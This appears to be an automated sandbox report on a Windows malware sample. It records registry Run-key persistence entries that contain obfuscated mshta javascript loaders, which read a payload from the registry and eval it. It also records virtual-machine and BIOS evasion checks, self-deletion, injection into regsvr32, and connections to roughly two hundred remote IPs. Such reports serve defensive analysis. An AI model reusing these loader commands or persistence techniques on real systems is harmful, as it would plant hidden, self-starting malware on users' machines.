Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:dEB5KeV9U=\"WMTv\";T71m=new%20ActiveXObject(\"WScript.Shell\");RRsf55apew=\"NsRM6O9kqa\";iSw93x=T71m.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1c4948ddc4\\\\32a3f375\");YfftK6LS=\"Zp\";eval(iSw93x);WcGufn3lY8=\"j7Blv7gJ2E\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:Au8btNLW=\"5\";mb19=new%20ActiveXObject(\"WScript.Shell\");mvmf1vxyd=\"meNgp\";Mfc4V=mb19.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1c4948ddc4\\\\32a3f375\");qun1HE0Y=\"N09Lt8LoH\";eval(Mfc4V);A5Xo2YOoq=\"zX8nNnG\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:moKz25khx=\"JGS3\";dI3=new%20ActiveXObject(\"WScript.Shell\");rYOMoci9=\"4a9WInxXmx\";OM18Wr=dI3.RegRead(\"HKCU\\\\software\\\\1c4948ddc4\\\\32a3f375\");YbwDAXJ09=\"5F\";eval(OM18Wr);aZK5XO5LL=\"Rrc6\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3788 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1212 wrote to memory of 8 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1212 wrote to memory of 8 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1212 wrote to memory of 8 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 8 wrote to memory of 3532 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 8 wrote to memory of 3532 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 8 wrote to memory of 3532 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 8 wrote to memory of 4256 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 8 wrote to memory of 4256 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 8 wrote to memory of 4256 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\b40e7591d3334624579042161dbaeacb_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 23.53.113.159:80 tcp
BR 200.149.183.33:80 tcp
US 11.15.191.141:443 tcp
US 174.130.26.2:80 tcp
US 151.208.215.87:80 tcp
IT 62.170.81.25:80 tcp
IT 18.65.66.148:80 tcp
CN 58.218.134.245:80 tcp
GB 86.187.73.240:80 tcp
CN 14.157.150.255:80 tcp
IR 5.211.191.41:80 tcp
US 26.188.120.106:80 tcp
CN 58.117.96.221:80 tcp
US 65.251.78.8:80 tcp
CN 114.233.61.122:80 tcp
US 170.43.86.225:80 tcp
US 205.221.246.78:80 tcp
RU 89.253.49.105:443 tcp
DK 94.18.144.114:80 tcp
N/A 10.180.220.218:80 tcp
US 215.197.17.134:443 tcp
US 129.152.189.138:80 tcp
US 12.12.181.152:80 tcp
IT 77.239.129.79:80 tcp
JP 126.55.26.188:80 tcp
US 155.214.151.123:80 tcp
US 173.111.240.138:80 tcp
ZA 41.125.249.58:443 tcp
N/A 10.165.145.249:80 tcp
US 8.108.105.27:80 tcp
BR 135.238.65.19:80 tcp
US 22.191.82.205:80 tcp
DE 77.22.189.88:80 tcp
CN 110.201.214.80:80 tcp
GB 164.38.187.16:80 tcp
BR 187.115.168.118:443 tcp
US 134.254.4.12:80 tcp
KR 175.196.54.70:80 tcp
CH 166.13.106.123:443 tcp
US 71.72.19.153:80 tcp
US 97.57.226.239:80 tcp
HK 1.65.138.184:80 tcp
US 71.226.96.112:80 tcp
SG 43.10.69.11:80 tcp
KR 218.146.30.9:80 tcp
N/A 10.201.121.184:80 tcp
DE 104.243.252.214:80 tcp
US 32.120.191.184:80 tcp
US 164.252.245.246:80 tcp
GB 143.234.141.229:8080 tcp
FR 86.71.143.2:80 tcp
NO 84.215.24.155:80 tcp
CH 128.179.161.168:80 tcp
IT 37.177.191.252:80 tcp
US 207.7.206.44:80 tcp
IN 182.70.208.231:80 tcp
CA 142.60.241.189:80 tcp
US 152.217.122.231:80 tcp
CN 171.86.110.168:80 tcp
US 40.192.222.80:80 tcp
VN 103.160.6.162:80 tcp
IN 49.35.110.156:80 tcp
US 44.185.103.222:80 tcp
US 4.110.70.5:80 tcp
US 54.56.70.51:80 tcp
CN 182.107.66.207:80 tcp
US 107.165.88.198:80 tcp
DE 3.75.137.17:80 tcp
MX 177.228.78.50:80 tcp
LU 131.166.93.96:80 tcp
TZ 197.152.196.173:80 tcp
US 66.255.104.50:80 tcp
JP 153.130.170.28:80 tcp
TN 102.155.178.98:443 tcp
US 72.212.41.221:80 tcp
RU 193.192.142.215:80 tcp
RS 160.99.13.65:80 tcp
JP 180.12.142.152:80 tcp
US 68.94.234.155:8080 tcp
AU 49.183.135.90:8080 tcp
US 38.248.17.164:80 tcp
KZ 188.247.182.159:80 tcp
CN 54.222.29.220:443 tcp
VN 171.244.104.127:443 tcp
MX 189.202.159.101:80 tcp
US 151.159.95.226:443 tcp
PL 194.29.148.20:80 tcp
DE 93.194.162.153:80 tcp
US 12.239.177.253:80 tcp
RU 195.112.117.85:80 tcp
ZA 41.174.211.109:80 tcp
US 29.104.199.95:80 tcp
JP 101.140.248.53:80 tcp
US 68.205.146.79:8080 tcp
US 214.202.197.221:80 tcp
FR 82.65.2.84:80 tcp
FR 178.33.39.177:80 tcp
FR 90.93.170.235:8080 tcp
US 55.53.87.181:80 tcp
RU 95.55.200.91:80 tcp
US 205.217.98.82:443 tcp
US 69.101.94.84:80 tcp
IN 125.18.35.31:80 tcp
US 38.5.159.137:80 tcp
US 97.22.108.21:80 tcp
IT 62.110.245.77:80 tcp
BY 195.222.90.220:80 tcp
US 172.168.248.176:8080 tcp
TW 180.205.86.212:80 tcp
TR 88.234.106.82:80 tcp
IN 182.77.150.55:443 tcp
US 208.226.118.13:443 tcp
US 172.185.234.155:80 tcp
US 4.44.87.62:80 tcp
US 19.29.179.5:8080 tcp
DE 2.209.174.46:80 tcp
IN 117.239.124.203:80 tcp
VN 118.69.37.125:80 tcp
GB 78.33.110.247:443 tcp
DE 77.52.145.69:80 tcp
CN 120.218.128.110:80 tcp
DE 53.40.242.252:443 tcp
MY 58.139.115.212:80 tcp
US 129.196.119.54:80 tcp
CN 223.163.137.236:80 tcp
US 33.255.101.159:80 tcp
US 29.205.22.102:80 tcp
AU 1.150.176.101:80 tcp
DE 80.190.79.248:80 tcp
IL 84.229.191.130:80 tcp
US 48.165.2.76:80 tcp
US 198.42.34.217:80 tcp
GB 195.11.136.49:80 tcp
JP 153.247.227.43:80 tcp
US 11.60.240.35:80 tcp
N/A 127.1.55.143:80 tcp
JP 27.82.220.213:80 tcp
FR 82.238.93.184:80 tcp
IN 13.235.5.219:80 tcp
GB 149.183.82.176:80 tcp
RO 194.102.115.102:80 tcp
US 75.172.73.85:80 tcp
IN 112.79.102.165:8080 tcp
US 4.128.75.200:8080 tcp
KR 59.23.18.18:80 tcp
CN 211.70.21.145:80 tcp
US 75.238.31.58:80 tcp
US 151.194.172.133:8080 tcp
CH 212.4.66.19:80 tcp
EG 105.82.243.92:80 tcp
US 139.178.187.61:80 tcp
GT 181.209.138.150:80 tcp
US 153.65.229.81:80 tcp
ES 84.88.213.206:80 tcp
AU 60.241.118.109:80 tcp
CA 142.219.192.138:80 tcp
US 74.74.82.244:80 tcp
ES 178.21.106.62:80 tcp
CN 42.100.240.74:80 tcp
JP 106.138.170.195:80 tcp
DE 88.198.87.198:80 tcp
IQ 85.31.41.251:80 tcp
CN 221.230.30.15:80 tcp
HK 154.91.199.147:80 tcp
US 22.220.29.253:80 tcp
PL 91.145.135.146:80 tcp
CN 117.87.230.185:80 tcp
US 169.67.110.125:8080 tcp
US 209.219.97.168:80 tcp
US 209.222.144.223:80 tcp
AU 202.161.80.7:443 tcp
AU 145.40.109.73:80 tcp
RO 86.35.194.245:80 tcp
US 7.34.32.131:80 tcp
RO 89.42.17.194:80 tcp
US 97.112.50.223:80 tcp
US 56.39.125.80:80 tcp
IE 20.166.12.55:80 tcp
RU 79.104.70.19:443 tcp
US 69.9.41.42:80 tcp
US 147.189.139.91:80 tcp
TN 41.229.241.82:80 tcp
CN 210.30.139.207:80 tcp
EG 102.56.140.168:80 tcp
FR 80.12.135.182:80 tcp
BR 177.57.219.195:80 tcp
US 12.254.61.118:443 tcp
GB 87.114.80.78:80 tcp
TW 114.46.220.9:80 tcp

Files

memory/3788-0-0x00000000023C0000-0x00000000024C0000-memory.dmp

memory/3788-1-0x0000000000600000-0x0000000000601000-memory.dmp

memory/3788-2-0x00000000023C0000-0x00000000024C0000-memory.dmp

memory/3788-3-0x0000000000400000-0x000000000047E000-memory.dmp

memory/3788-5-0x00000000022E0000-0x00000000023AC000-memory.dmp

memory/3788-9-0x00000000022E0000-0x00000000023AC000-memory.dmp

memory/3788-7-0x00000000022E0000-0x00000000023AC000-memory.dmp

memory/3788-6-0x00000000022E0000-0x00000000023AC000-memory.dmp

memory/3788-8-0x00000000022E0000-0x00000000023AC000-memory.dmp

memory/3788-11-0x00000000022E0000-0x00000000023AC000-memory.dmp

memory/3788-17-0x0000000000400000-0x000000000047E000-memory.dmp

memory/1212-15-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/1212-20-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/1212-18-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/1212-21-0x0000000000720000-0x00000000007EC000-memory.dmp

memory/1212-25-0x0000000000720000-0x00000000007EC000-memory.dmp

memory/1212-24-0x0000000000720000-0x00000000007EC000-memory.dmp

memory/1212-23-0x0000000000720000-0x00000000007EC000-memory.dmp

memory/1212-22-0x0000000000720000-0x00000000007EC000-memory.dmp

memory/8-32-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/8-34-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/8-37-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-36-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/1212-26-0x0000000000720000-0x00000000007EC000-memory.dmp

memory/8-38-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-39-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-41-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-40-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-42-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-44-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-47-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-50-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-51-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-49-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-46-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-45-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-43-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-48-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/3532-52-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/3532-55-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/3532-53-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/3532-56-0x0000000000850000-0x000000000091C000-memory.dmp

memory/3532-61-0x0000000000850000-0x000000000091C000-memory.dmp

memory/3532-60-0x0000000000850000-0x000000000091C000-memory.dmp

memory/3532-59-0x0000000000850000-0x000000000091C000-memory.dmp

memory/3532-58-0x0000000000850000-0x000000000091C000-memory.dmp

memory/3532-57-0x0000000000850000-0x000000000091C000-memory.dmp

memory/8-62-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/8-63-0x0000000000EA0000-0x0000000000F6C000-memory.dmp

memory/4256-64-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/4256-65-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/4256-67-0x0000000000E90000-0x0000000000E99000-memory.dmp

memory/4256-68-0x0000000000660000-0x000000000072C000-memory.dmp